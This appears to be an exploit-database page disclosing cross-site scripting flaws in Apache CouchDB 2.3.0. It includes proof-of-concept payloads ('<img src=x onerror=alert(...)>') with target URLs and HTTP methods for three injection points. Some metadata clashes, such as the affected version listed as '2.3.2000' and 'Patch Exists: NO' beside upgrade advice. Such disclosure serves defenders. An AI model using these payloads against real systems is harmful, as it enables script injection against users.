header-logo
Suggest Exploit
vendor:
Apache CouchDB
by:
Ozer Goker
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: Apache CouchDB
Affected Version From: 2.3.2000
Affected Version To: 2.3.2000
Patch Exists: NO
Related CWE:
CPE: a:apache:couchdb:2.3.0
Metasploit:
Other Scripts:
Platforms Tested:
2019

Apache CouchDB 2.3.0 | Cross-Site Scripting

The Apache CouchDB server 2.3.0 is vulnerable to Cross-Site Scripting (XSS) attacks. This vulnerability allows an attacker to inject malicious scripts into web pages viewed by other users, leading to unauthorized actions or data theft.

Mitigation:

To mitigate this vulnerability, it is recommended to upgrade to a patched version of Apache CouchDB. Additionally, input validation and output encoding should be implemented to prevent XSS attacks.
Source

Exploit-DB raw data:

##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.0
##################################################################################################################################

Introduction

A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.

#################################################################################

XSS details: DOM Based & Reflected & Stored

#################################################################################

XSS1 | DOM Based - Create Database

URL
http://127.0.0.1:5984/_utils/#/_all_dbs


PAYLOAD
<img src=x onerror=alert(1)>

<input id="js-new-database-name" type="text" class="input-xxlarge"
placeholder="Name of database" value="<img src=x onerror=alert(1)>">

#################################################################################

XSS2 | DOM Based & Stored - Add Option

URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E

METHOD
Put

PAYLOAD
<img src=x onerror=alert(2)>

<input class="input-option-name" type="text" name="name" placeholder="Name">

#################################################################################

XSS3 | DOM Based & Stored - Delete Option

URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E

METHOD
Delete

PAYLOAD
<img src=x onerror=alert(2)>

#################################################################################

Navigation

Suggest Exploit

Services By CQR